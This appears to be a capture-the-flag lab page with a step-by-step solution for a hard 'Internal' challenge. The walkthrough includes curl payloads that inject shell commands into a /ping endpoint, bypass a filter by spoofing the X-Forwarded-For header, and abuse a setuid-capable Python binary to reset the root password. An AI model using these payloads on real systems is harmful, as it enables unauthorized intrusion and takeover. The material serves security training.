Avatar

Labs / Internal

  • Hard
  • Released 01 Feb 2025

🔒 Can you navigate and exploit an internal corporate network?

A corporate internal network contains multiple services and security controls that appear secure from the outside. Through careful network enumeration and service analysis, skilled penetration testers can identify weaknesses in internal infrastructure and achieve lateral movement. 🎯 Time to demonstrate internal network exploitation skills!

2
Flags
60
Points
Hard
Solution Available
Free Access
Start Lab Environment

Launch your dedicated AWS machine to begin hacking

~1-2 min setup
AWS dedicated
Private instance
Industry standard
Hard

🔒 Internal - Complete Command Injection and Capability Exploitation Solution

Objective: This hard-level challenge focuses on exploiting command injection vulnerabilities and leveraging Linux capabilities for privilege escalation without reverse shell access.
🔍 Step 1: Network Reconnaissance

Begin with port scanning to identify running services:

# Port scan reveals HTTP and SSH services
nmap -Pn -sC -sV -p- <target-ip>

# Expected services:
# 22/tcp - SSH
# 80/tcp - HTTP (Status Page)
# 8080/tcp - HTTP (Main Application)

Port 80 shows a status page, port 8080 hosts the main application with the vulnerable ping endpoint, and SSH is available on port 22.

🔍 Step 2: Web Application Analysis

Explore the web application to identify vulnerable endpoints:

# Visit the main application
curl http://<target-ip>:8080

# Discover the /ping endpoint
# Test for command injection vulnerabilities
# Analyze request parameters and headers

The application contains a /ping endpoint that is vulnerable to command injection through the host parameter.

Important: When testing command injection payloads, you may encounter the error "Invalid input: Special characters not allowed from remote access". To bypass this restriction, add the header X-Forwarded-For: 127.0.0.1 to make the server believe the request is coming from localhost rather than a remote source.
🔍 Step 3: Command Injection Testing and Exploitation

Test and exploit the command injection vulnerability for information gathering:

# Test basic command injection
curl -X POST http://<target-ip>:8080/ping -H "X-Forwarded-For: 127.0.0.1" -d 'host=8.8.8.8;whoami'

# Enumerate system information
curl -X POST http://<target-ip>:8080/ping -H "X-Forwarded-For: 127.0.0.1" -d 'host=8.8.8.8;id'

# Check current directory and permissions
curl -X POST http://<target-ip>:8080/ping -H "X-Forwarded-For: 127.0.0.1" -d 'host=8.8.8.8;pwd'
curl -X POST http://<target-ip>:8080/ping -H "X-Forwarded-For: 127.0.0.1" -d 'host=8.8.8.8;ls%20-la'

The command injection allows direct command execution on the target system. The X-Forwarded-For: 127.0.0.1 header is essential to bypass the "Special characters not allowed from remote access" error by making the server treat the request as if it originated from localhost.

🔍 Step 4: System Enumeration via Command Injection

Use command injection to enumerate the system for privilege escalation opportunities:

# Check for files with elevated capabilities
curl -X POST http://<target-ip>:8080/ping -H "X-Forwarded-For: 127.0.0.1" -d 'host=8.8.8.8;getcap%20-r%20/%202>/dev/null'

# Look for SUID binaries
curl -X POST http://<target-ip>:8080/ping -H "X-Forwarded-For: 127.0.0.1" -d 'host=8.8.8.8;find%20/%20-perm%20-4000%202>/dev/null'

# Check sudo privileges (if applicable)
curl -X POST http://<target-ip>:8080/ping -H "X-Forwarded-For: 127.0.0.1" -d 'host=8.8.8.8;sudo%20-l'

# Enumerate interesting files and directories
curl -X POST http://<target-ip>:8080/ping -H "X-Forwarded-For: 127.0.0.1" -d 'host=8.8.8.8;ls%20-la%20/app'

The getcap command reveals that /app/python3new has the capability to change the effective user ID (setuid), which can be exploited for privilege escalation.

🔍 Step 5: User Flag Retrieval

Before escalating privileges, retrieve the user flag using the current access level:

# Find and retrieve the user flag
curl -X POST http://<target-ip>:8080/ping -H "X-Forwarded-For: 127.0.0.1" -d 'host=8.8.8.8;find%20/home%20-name%20"flag-user.txt"%202>/dev/null'

# Read the user flag content
curl -X POST http://<target-ip>:8080/ping -H "X-Forwarded-For: 127.0.0.1" -d 'host=8.8.8.8;cat%20/home/*/flag-user.txt'

# Alternative: Search more broadly if needed
curl -X POST http://<target-ip>:8080/ping -H "X-Forwarded-For: 127.0.0.1" -d 'host=8.8.8.8;find%20/%20-name%20"flag-user.txt"%202>/dev/null%20-exec%20cat%20{}%20\;'

The user flag can be retrieved directly through command injection without requiring privilege escalation, as the current user has read access to the user flag location.

🔍 Step 6: Capability-Based Privilege Escalation

Exploit the Python binary's capabilities to escalate privileges and reset root password:

# Reset root password using capability exploitation
curl -X POST http://<target-ip>:8080/ping -H "X-Forwarded-For: 127.0.0.1" -d 'host=8.8.8.8;/app/python3new%20-c%20"import%20os;%20os.setuid(0);%20os.system(%27echo%20root:root%20|%20chpasswd%27)"'

This command leverages the setuid capability to:

  • Set the user ID to root using os.setuid(0)
  • Execute the chpasswd command with root privileges
  • Reset the root password to "root" for SSH access
🔍 Step 7: SSH Access and Root Flag Retrieval

Use SSH to log in as root and retrieve the root flag:

# SSH login as root with the reset password
ssh root@<target-ip>
# Password: root

# Verify root access
whoami
id

# Retrieve root flag
cat /root/flag-root.txt

With SSH root access achieved, the root flag can be retrieved from the /root directory. The user flag was already obtained in Step 5.

🔍 Step 8: Alternative Root Flag Retrieval via Command Injection

If SSH access is not available, the root flag can also be retrieved directly through command injection:

# Retrieve root flag via command injection
curl -X POST http://<target-ip>:8080/ping -H "X-Forwarded-For: 127.0.0.1" -d 'host=8.8.8.8;/app/python3new%20-c%20"import%20os;%20os.setuid(0);%20os.system(%27cat%20/root/flag-root.txt%27)"'

This approach allows root flag retrieval without requiring SSH access, using only the command injection vulnerability. The user flag was already obtained in Step 5.

🔍 Step 9: Attack Chain Summary

The complete attack chain involves:

  1. Port Scanning: Identify HTTP services on ports 80 and 8080, plus SSH on port 22
  2. Web Analysis: Discover vulnerable /ping endpoint in the main application
  3. Command Injection Testing: Test and confirm command execution via host parameter
  4. System Enumeration: Use command injection to discover system information and capabilities
  5. User Flag Retrieval: Obtain user flag through command injection
  6. Capability Discovery: Find /app/python3new with setuid capability using getcap
  7. Privilege Escalation: Exploit setuid capability to reset root password
  8. Root Flag Retrieval: SSH login as root or direct root flag retrieval via command injection
Key Vulnerabilities: Command injection in web application and misconfigured Linux capabilities allowing privilege escalation without reverse shell access.
Real-World Application: This challenge demonstrates command injection exploitation in environments with restricted outbound connectivity, combined with Linux privilege escalation techniques using capabilities.